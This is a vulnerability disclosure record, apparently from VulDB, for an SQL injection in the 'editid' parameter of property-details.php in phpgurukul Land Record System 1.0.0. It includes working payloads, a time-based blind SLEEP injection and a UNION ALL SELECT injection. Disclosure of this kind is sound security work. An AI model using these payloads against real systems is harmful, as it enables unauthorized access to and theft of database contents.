Title | phpgurukul Land Record System 1.0.0 SQL Injection |
---|
Description | In the file property-details.php located at '/landrecordsys/admin/property-details.php?editid=1', there is a possibility of performing SQL injection on the 'editid=' parameter. This allows attackers to inject malicious SQL code into the query. For example, if the 'editid=' parameter is set to:
For time-based blind:
Payload: editid=' AND (SELECT 9718 FROM (SELECT(SLEEP(5)))KpHQ) AND 'sXVm'='sXVm
For UNION query:
Payload: editid=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b707a71,0x666c4562427a6745626e766d43786b66526256496c5a5a565551494b414c4d6768506d4369594f77,0x717a7a7a71),NULL,NULL,NULL-- - |
---|
Source | ⚠️ https://phpgurukul.com/land-record-system-using-php-and-mysql/ |
---|
User | Havook (UID 71104) |
---|
Submission | 12/30/2024 05:17 PM (2 months ago) |
---|
Moderation | 12/31/2024 09:58 AM (17 hours later) |
---|
Status | Accepted |
---|
VulDB Entry | 289832 [PHPGurukul Land Record System 1.0 property-details.php editid sql injection] |
---|
Points | 20 |
---|